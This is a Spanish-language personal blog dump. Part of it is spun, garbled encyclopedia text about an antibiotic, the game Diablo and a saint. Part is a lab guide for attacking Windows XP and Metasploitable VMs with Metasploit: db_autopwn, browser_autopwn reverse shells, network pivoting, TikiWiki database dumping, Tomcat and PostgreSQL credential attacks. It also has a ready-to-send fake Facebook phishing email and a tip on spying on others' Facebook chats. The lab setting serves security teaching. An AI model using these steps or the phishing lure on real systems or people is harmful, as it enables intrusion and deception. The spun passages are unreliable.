lunes, 9 de julio de 2012

cefradina

la cefradina es un antibiotico una de las cefalosporinas de primera generacion, nervioso contra germenmicroorganismos gram positivas[2] como el estreptococo beta hemolitico, estafilococos, incluyendo cepas productoras de penicilinasa, escherichia coli, neumococo, proteus mirabilis, clases klebsiella, haemophilus influenzae. la cefradina es rapidamente absorbida despues de su administracion verbal en ayunas.[3] navegacion

diablo

the Belceb� fan art section has been updated with four new pieces of fan�tico artwork. would you like to share your artistic talents with the community? submit your adicto art today! windows windows 95 or better, 60 mhz pentium or better, 8 mb ram (16 mb for multiplayer), svga compatible graphics card (640 x 480 maximum), 2x cd-rom drive mac os power macintosh or compatible, 8 mb ram with aparente memory, system 7.5 or higher, 2x cd-rom drive el diablo, segun el cristianismo, es un ser fantasmag�rico maligno, competidor de dios y tentador de los hombres; en el novicio testamento se identifica a oriente cuerpo con el satán hebrero del compendio de job (1:6-8), al Luzbel del evangelio de mateo (mateo 4:8-10), la serpiente inefable de genesis (genesis 3:1-5) y al gran dragon del hecatombe (apocalipsis 12:9), como un solo personaje. diablo es un videojuego de rol de accion creado por blizzard north (una ex-rama no comercial de blizzard entertainment) en el año 1996 y que ha destacado por ser uno de los más notables canones del genero de rol en el mundo virtual. this site is also available in englishview this site in english en nuestra página de aniversario podrás descifrar la cronologia blizzard, detallando los azares representativos en la historia de blizzard entertainment. desde sus cabezas en 1991, cuando mike morhaime, frank pearce y allen adham comenzaron silicon synapse, la compañia que luego se convertiria en blizzard, hasta ahora dia.

marcelino champagnat

san marcelino jose benito champagnat chirat (marlhes, loira, francia, 1789 - saint-chamond 1840), fue un cura frances, fundador de los hermanos maristas. marcellin joseph benoît champagnat chirat (n. marlhes, loira; 20 de mayo de 1789 - m. saint-chamond; 6 de junio de 1840) fue un eclesi�stico frances, fundador de los hermanos maristas.

diablo

the satan�s incondicional art section has been updated with four new pieces of fan artwork. would you like to share your artistic talents with the community? submit your adepto art today! windows windows 95 or better, 60 mhz pentium or better, 8 mb ram (16 mb for multiplayer), svga compatible graphics card (640 x 480 maximum), 2x cd-rom drive mac os power macintosh or compatible, 8 mb ram with posible memory, system 7.5 or higher, 2x cd-rom drive el diablo, segun el cristianismo, es un cuerpo incre�ble maligno, competidor de dios y tentador de los hombres; en el aprendiz testamento se identifica a levante ser con el satán hebrero del libro de job (1:6-8), al satan�s del evangelio de mateo (mateo 4:8-10), la serpiente maravilloso de genesis (genesis 3:1-5) y al gran dragon del desastre (apocalipsis 12:9), como un solo personaje. diablo es un videojuego de rol de accion creado por blizzard north (una ex-rama marginal de blizzard entertainment) en el año 1996 y que ha marcado por anatom�a individualidad de los más trascendentes arquetipos del genero de rol en el tierra virtual. this site is also available in englishview this site in english en nuestra página de aniversario podrás dar en el clavo la cronologia blizzard, detallando los albures significativos en la hechos de blizzard entertainment. desde sus cabezas en 1991, cuando mike morhaime, frank pearce y allen adham comenzaron silicon synapse, la compañia que luego se convertiria en blizzard, hasta presente dia.

domingo, 8 de julio de 2012

probando squidpro

prueba 1 2 3

jueves, 5 de julio de 2012

yaveo.net interesante

Navegando en internet me encontre con esta web ! al parecer esta muy interesante ps tiene varios tutoriales de distintas areas : - Matematicas - Fisica - Estadistica - Programacion - Redes Esto suele ser de mucha ayuda en los momentos en los que no se puede contar en ese momento con un profesor o un tutor aparte. El uso de todo el material de la web es totalmente gratis, lo que la hace mas interesante y por lo que pude ver estan ingresando videotutos y cursos continuamente. La direccion de la pagina es http://yaveo.net pueden echarle una ojeada y ver que les parece !

miércoles, 19 de enero de 2011

Sabias que

Sabias que en facebook puedes mantener dos sesiones al mismo tiempo?

Eso significa que puedes espiar las conversaciones de alguien en tiempo real :O

Guía de laboratorio firewall e ids

“Una vulnerabilidad es tan limitada como tú quieras que sea”

En su computador encontrara 3 maquinas virtuales llamadas {1,2,3},corralas
1: backtrack(BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general)
2: Ubuntu server
3: Windows xp(Windows xp sp2)

Para backtrack dar start backtrak stream buffer (primera opción)
Ifconfig eth1 192.168.0.11 netmask 255.255.255.0
Luego escribir startx

Ubuntu server:
Escribir login :
User: msfadmin
Password: msfadmin
Escribir startx

Windows xp
No toca hacer nada






Primer ataque(firewall desactivado)

Para nuestro primer ataque vamos a utilizar el agente malicioso backtrack y Windows xp
Primero vamos a comprobar la eficiencia de nuestro firewall instalado por defecto
En backtrack abrimos una konsole y escribimos ping 192.168.0.120 y veremos que no nos permite hacer un ping
Luego nmap 192.168.0.120 para observar si podemos ver los puertos, pero efectivamente están todos filtrados.
Ir a backtrack->penetration->All ->Msfconsole

Ahí escribir db_driver sqlite3
db_create redes
db_connect redes
Eso lo hacemos para crear una base de datos y allí guardar todas las vulnerabilidades encontradas método llamado ( Vulnerability Assessment: análisis de puntos débiles o vulnerabilidades De carácter técnico realizado a un sistema, guardando estos puntos débiles en una base de datos).


Como este primer ataque se divide en dos , procedemos a desactivar el firewall de Windows xp
Inicio->panel de control->centro de seguridad->firewall de Windows->marcar la opción desactivado (no se recomienda)

Ahora en backtrack , ya tenemos lista nuestra base de datos (bolsa) y lo que haremos será hacer un análisis de footprinting para saber a qué tipo de sistema nos enfrentamos


Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos.





Escribir en una msfconsole
db_namp –PN –A 192.168.0.120
-PN : intenta identificar los servicios por los puertos abiertos en el sistema esto permite evaluar cada servicio de forma individual para intentar ubicar vulnerabilidades en los mismos.
-A: análisis completo para la identificación del sistema operativo

Luego escribir
Db_autopwn : script que permite realizar ataques múltiples basándose desde una base de datos

db_autopwn -t -p –e

Ahora revisamos las sesiones que se han creado

El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional.




Sessions –l

Para elegir la sesión hacemos sessions –i 1 o 2

Creamos la Shell reverse

Shell

Si no podemos crearla damos escribimos exit y re elegimos la sesión



Primer ataque (firewall activado)

Lo que haremos en este tipo de ataque es hacer que la victima caiga en una trampa y por medio de esta crear una Shell reversa.
Ir a backtrack->penetration->All ->Msfconsole

Alli escribir : nmap 192.168.0.120

Como podemos ver no se ha podido establecer ping con la víctima , cualquier persona creería que esto es seguro , pero ya veremos que no lo es .



Ahora escribir :
Use server/browser_autopwn
Este es un exploit que nos permite crear un servidor cargado de script envenenado con esto crearemos la conexión remota.

Show options


Set LHOST 192.168.0.11 // esto quiere decir donde quedara alojado nuestro server

Set SRVHOST 192.168.0.11// con esto le decimos que haga la conexión a el mismo para que en vez de lanzar un ataque a un servidor se vuelva promiscuo y espere peticiones


Set SRVPORT 80 // indicamos el puerto de salida de nuestro servidor

Ahora escribir: run


Acá veremos que se acaba de crear nuestro servidor.


El siguiente paso es hacer que nuestra victima caiga ingresando a la pagina pishing .

Como?
En la vida real se podría hacer mediante un mensaje de notificación de facebook ,
Es tan sencillo como crear un mensaje nuevo desde nuestra cuenta de Hotmail.com allí darle en editar texto modo html

Y escribir los datos que faltan en las xxx y luego enviarlo 










AMIGO_QUE_ENVIA_MENSAJE ha etiquetado una foto tuya en tu álbum.

Para ver las fotos, sigue el siguiente enlace:


http://www.facebook.com/n/?photo.php&pid=439128&op=1&view=all&subj=1101827805&id=1405875231&mid=a0d79cG41ac8eddG8ac16dG5

Gracias,
El equipo de Facebook

___
Este mensaje estaba destinado a PNOMBRE DE LA VICTIMA . Deseas controlar los mensajes de correo electrónicos que recibes de Facebook? Visita:
http://www.facebook.com/editaccount.php?notifications&md=cGhvdG9fdGFnO2Zyb209MTQwNTg3NTIzMTt1aWQ9MTQwNTg3NTIzMTtwaWQ9NDM5MTI4O3RvPTExMDE4Mjc4MDU=&mid=a0d79cG41ac8eddG8ac16dG5
Las oficinas de Facebook estan en 1601 S. California Ave., Palo Alto, CA94304.
En Windows xp abrimos el navegador y escribimos:
192.168.0.11/código
El código es el que sale de donde dice Using URL: 192.168.0.11/código

Escribimos sessions –l
Luego sessions –i número de la sesión
Podemos crear una Shell escribiendo “Shell”














COMPROMETIENDO UNA ARQUITECTURA DMZ

En la misma msfconsole escribir:
route
run get_local_subnets

run arp_scanner –r 192.168.0.1/24 // para saber que nodos están activos

Ahora pulsamos control+z para dejar nuestra sesión en background
Escribimos Y
Back
Route
route print
route add 192.168.0.22 255.255.255.0 1// añadimos nuestra nueva víctima que está dentro de la red comprometida
route print // verificamos que se haya creado la sesión
sessions –l
back // volvemos atrás para lanzar otro exploit

use auxiliary/scanner/portscan/tcp //exploit

lo que haremos será evaluar cuales puertos se encuentran abiertos

set PORTS 1-1000
set RHOSTS 192.168.0.22
run


connect -c 1 192.168.111.2 23// nos conectamos al puerto 23 por medio de la primera víctima que hace de puente


Atacando una base de datos dentro de la DMZ
Tiki CMS/Groupware o TikiWiki es un sistema de gestión de contenidos de índole colaborativa (CMS/Groupware) fácil de configurar y personalizar, diseñado para crear portales, sitios comunitarios, intranets y aplicaciones web en general.

Como ya sabemos que puertos tiene hacemos un
db_driver sqlite3
db_create a
db_connect a
db_nmap –NP –A 192.168.0.22

luego hacemos un db_services
y listo ahora damos

en esta sección atacaremos todas las vulnerabilidades encontradas y realizaremos el ataque vía tunneling 192.168.0.120


back
use auxiliary/admin/tikiwiki/tikidblib // atacaremos la base de datos que está en 192.168.0.22 que posee myql

set RHOST 192.168.229.129

exploit
ahora ya tenemos los datos de la base de datos

Abrimos otra konsole y escribimos mysql –u root –h 192.168.0.22 –proot

Atacando el servidor tomcat
Tomcat (también llamado Jakarta Tomcat o Apache Tomcat) funciona como un contenedor de servlets desarrollado bajo el proyecto Jakarta en la Apache Software Foundation. Tomcat implementa las especificaciones de los servlets y de JavaServer Pages (JSP) de Sun Microsystems.






En la msfconsole

use auxiliary/scanner/http/tomcat_mrg_login

set RHOSTS 192.168.0.22
set RPORT 8180
run


Cuando aparezca en verde es que encontró el login [+]
.. Aprovechando el user y el pass conseguimos otro exploit
En la msfconsole escribir

Back

use exploits/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RPORT 8180
set RHOST 192.168.0.22
control +z
sessions –l




Ataque PostgreSQL
En la misma msfconsole
Back
use auxiliary/scanner/ postgres/postgres_login
set RHOST 192.168.0.22
nos logramos loguear con
usuario y password: postgres.

Ahora que ya tenemos los datos nos interesa el el fichero de configuración de usuarios para después realizar un brute forcé hacia el ssh

Back
use auxiliary/admin/ postgres/postgres_readfile
set PASSWORD postgres
set RHOST 192.168.0.22
Por último hacemos un db_autopwn –t –e –p

Elogio a la Dificultad

Es difícil entender el concepto de felicidad cuando la sociedad nos la vende como algo perpetuo, en la realidad el ser humano está siempre en la búsqueda de la liberación de sí mismo y busca excusas para no sentirse culpable de su falta de sapiencia sobre lo que desconoce y por tanto lo que teme .La felicidad viene en latas de sardinas pero el hombre espera comprar una gran ración esperando que estas le sirvan en momentos de tormenta y resguardo. Pero porque es tan difícil ser feliz? Tal vez sea porque el hombre está acostumbrado a llevar su vida y completar sus logros por el camino más fácil y porque no? En el mundo donde vivimos siempre tan capitalista importa es el logro de los objetivos sin justificar medios ni acciones que perjudiquen a los individuos en los que somos parte de la sociedad. Las personas sueñas despiertas y esperan y muchas veces confunden sus sueños con al realidad , se imaginan en carros lujosos mujeres ganando mucho dinero y finalmente siendo feliz ,pero al momento de alcanzar un logro académico y superarse a si mismo de manera intelectual sin importar el hecho , perdían el sentido de sus sueños y cada vez lo ven más lejos, en este sentido el hombre no se preocupa mas haya de pasar el momento de sentirse bien pasarla bien , pero sus metas se ven recabadas en drogas sexo vicios vánales que no comprenden no intimidan solo gustan y defienden el creer en la felicidad absoluta porque es posible ser feliz mientras estés ligado con las reglas de mostrar lo que no eres de un consumismo canibalista donde se desprecia a las personas por lo que visten y tienen grupos donde el ser real esta en compartir lo que se expresa en valor monetario esperando sentirse regocijado por eso que tenemos y vació por lo que nos falta comprar, en su finalidad basura pero si que es difícil vivir sin basura y mucho menos solucionar los problemas difíciles solo postergándolos y esperando que tu ser de mañana lo resuelva porque tu siempre tendrás 3 días en tu vida pero solo estas en uno y es el hoy así que tus problemas de ayer quedaran preocupándote pero no perdiste la esperanza de que el día de mañana lo resuelvas siempre y cuando no sea necesario realizar mucho esfuerzo y si es posible que lo realice otra persona mucho mejor.
La responsabilidad viene dada con el ánimo de satisfacción cuando logramos alcanzar nuestras metas y el triunfo muchas veces se logra con el esfuerzo hecho a lo largo del camino, pero el hombre busca caminos cortos resultados instantáneos y que beneficio tiene esto? pues que se pretende suplantar los logros propuestos por sub logros que se medio realizan trabajando con una responsabilidad mínima. En el caso de Colombia se ha decidido por mandato de los grandes personajes que gobiernan este país que para salir rápido de una pobreza absoluta y que para aportar mas en el desarrollo de nuestra Colombia, es mejor estudiar una carrera técnica la cual nos brindara toda la información y formación necesaria para salir a una selva llena de técnicos igual que tu y regalando su trabajo para volverse mas competitivo. Un estudiando de 11 de bachillerato de estrato 1 2 y 3 ya no piensa en estudiar 5 años porque quiere tener su propio dinero y manejarse ya como un adulto .Pero el estado también los ha hecho pensar que un estudio técnico es la solución a los problemas económicos porque es eso solo es el dinero un joven no estudia por aprender estudia por ganar dinero entonces encontraremos trabajadores que lucharan por trabajar muy poco y ganar mucho por crear sindicatos y días festivos y exigir prestaciones , esto en algún sentido esta bien porque defiende los derechos y muchas empresas también los explotan demasiado por el simple hecho de ser mano de obra , pero aquí tenemos el otro ejemplo un estudiando de 11 grado de bachillerato de estratos 3 ,4 y 5 se decide por estudiar una carrera de tipo cocina ahora bien porque los jóvenes de ahora se interesan tanto por la cocina? Porque en esta era el esfuerzo viene dado desde pequeños , en primaria se enseña y se aprende sobre la responsabilidad sobre que la lucha crea logros y éxito pero los jóvenes ven esta lucha opacada por las grandes sumas de dinero y la limosidad de sus padres que reemplazan amor por regalos exóticos y caros y no enseñan a un niño que el esfuerzo es recompensado y finalmente terminan ahogados en preguntas existenciales revolcándolas las cabezas diciéndoles que no saben que hacer con sus vidas . Pero no hay que menospreciar y a los chefs el mundo es un mercado cambiante y solo el mañana nos dirá si la ola de técnicos acabara con los profesionales y afines que creen que este esfuerzo los hace llegar un piso arriba sobre la competitividad profesional.

Pero tal vez el éxito no siempre este dado con la realización de un esfuerzo conveniente ahora se lucha con acciones que hace 50 años solo las personas soñaban y creían imposible pero no por ser así debemos abandonar nuestro emprendimiento esas veces que se intento y no se logro nos significa que todo esfuerzo es en vano solo es seguir una lucha constante no por creer en la verdad de una sociedad debes creerla esfuérzate por creer en ti en confiar en ti no en seguir a un grupo que pretende tener la verdad porque solo encontraras una falsa felicidad que te durara lo que tardaste en buscarla luchar es sinónimo de esfuerzo lucha por saber quién eres por sentirte feliz por superarte a ti mismo y entender que la vida no es más que un momento que es muy largo y que el tiempo que dures buscando la felicidad en cosas que no te darán realmente esta serán el tiempo que te cobrara la vida por no haber aprovechado lo que realmente es ser feliz. Lucha por ser siempre un ente que se esfuerza no un ente que vive , algunas personas solo viven otras hacen que su vida cambie a la sociedad . Nunca esperes al mesías al salvador que nos de la luz para nuestra liberación atenuante que soñamos por alcanzar cada día, no sigas sumiso solo porque te lo dicen tus padres los ideales son ideales y el único que importa es lograrlos porque siempre será así , has las cosas que creas que no son imposibles así la sociedad te diga que si lo es porque vivimos en un mundo inmerso de mentiras y falsas excusas para aprovecharse de los de más de vivir de los demás y sentirse bien , robar la felicidad de otros pensando que es como una flujo de energía que se pasa de uno a otro por ósmosis , ese sentimiento de ver a las personas mal y tu bien debes desecharlo y ojala nunca volverlo a sacar por que la vida misma te enseña que las cosas nunca serán fáciles y que por más que logres evadir tu lucha esta te encontrara ya agotado y sin esperanzas y ella te cobrara paso por paso el camino que te falto para ser feliz.

Que esperar

Que esperar de mi boyante noche que las miradas se ocultan a tu voz de las garras de lobos que buscan sangre sin esperar ni un instante para morir por tus besos en el adiós de un verbo eterno que me dice que algún día seras mi amor eterno